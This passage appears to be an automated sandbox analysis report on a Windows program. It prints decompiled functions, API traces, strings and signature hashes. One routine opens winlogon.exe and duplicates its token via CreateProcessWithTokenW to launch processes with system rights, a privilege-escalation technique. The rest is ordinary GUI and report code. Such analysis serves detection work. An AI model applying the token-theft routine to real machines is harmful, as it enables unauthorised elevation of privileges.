			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}

APIs

OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3

Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

Strings

winlogon.exe, xrefs: 00401E4B

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
String ID: winlogon.exe
API String ID: 1315556178-961692650
Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}

APIs

memset.MSVCRT ref: 00405257
_snwprintf.MSVCRT ref: 00405285
wcslen.MSVCRT ref: 00405291
memcpy.MSVCRT ref: 004052A9
wcslen.MSVCRT ref: 004052B7
memcpy.MSVCRT ref: 004052CA

Strings

%s (%s), xrefs: 0040527A

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}

APIs

memset.MSVCRT ref: 00406174
GetDlgCtrlID.USER32 ref: 0040617F
GetWindowTextW.USER32 ref: 00406196
memset.MSVCRT ref: 004061BD
GetClassNameW.USER32 ref: 004061D4
_wcsicmp.MSVCRT ref: 004061E6

Part of subcall function 00406025: memset.MSVCRT ref: 00406038
Part of subcall function 00406025: _itow.MSVCRT ref: 00406046

Strings

sysdatetimepick32, xrefs: 004061E0

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
librarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

0x00404706
0x00404714
0x0040471c
0x00404721
0x0040472b
0x00404733
0x00404735
0x00404735
0x00404733
0x00404751
0x00404780
0x00404753
0x0040475e
0x00404766
0x0040476c
0x00404770
0x00404770
0x0040478a

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
wcslen.MSVCRT ref: 00404756
wcscpy.MSVCRT ref: 00404766
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
wcscpy.MSVCRT ref: 00404780

Strings

netmsg.dll, xrefs: 00404726

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: netmsg.dll
API String ID: 2767993716-3706735626
Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}

APIs

memset.MSVCRT ref: 004059B5

Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

_wcsicmp.MSVCRT ref: 004059FA
wcschr.MSVCRT ref: 00405A0E
_wcsicmp.MSVCRT ref: 00405A20
OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
CloseHandle.KERNEL32(?), ref: 00405A5A
CloseHandle.KERNEL32(00000000), ref: 00405A61

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
String ID:
API String ID: 768606695-0
Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98

Uniqueness

Uniqueness Score: -1.00%

Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}

APIs

wcscat.MSVCRT ref: 00407708
_snwprintf.MSVCRT ref: 0040772F

Strings

<td bgcolor=#%s>%s, xrefs: 00407657
 , xrefs: 00407702
<td bgcolor=#%s nowrap>%s, xrefs: 00407649
<tr>, xrefs: 00407661

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}

APIs

GetMenuItemCount.USER32 ref: 00406074
memset.MSVCRT ref: 00406093
GetMenuItemInfoW.USER32 ref: 004060CF
wcschr.MSVCRT ref: 004060E7

Strings

6, xrefs: 004060B6
0, xrefs: 004060AE

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}

APIs

GetSystemMetrics.USER32 ref: 00402C1C
GetSystemMetrics.USER32 ref: 00402C23
GetSystemMetrics.USER32 ref: 00402C2A
GetSystemMetrics.USER32 ref: 00402C30
GetSystemMetrics.USER32 ref: 00402C47
GetSystemMetrics.USER32 ref: 00402C4E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$Window
String ID:
API String ID: 1155976603-0
Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}

APIs

memset.MSVCRT ref: 004036F6
memset.MSVCRT ref: 00403712

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Part of subcall function 00405236: memset.MSVCRT ref: 00405257
Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA

GetSaveFileNameW.COMDLG32(?), ref: 004037AF
wcscpy.MSVCRT ref: 004037C3

Strings

cfg, xrefs: 00403717
L, xrefs: 0040378B

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
String ID: L$cfg
API String ID: 275899518-3734058911
Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63
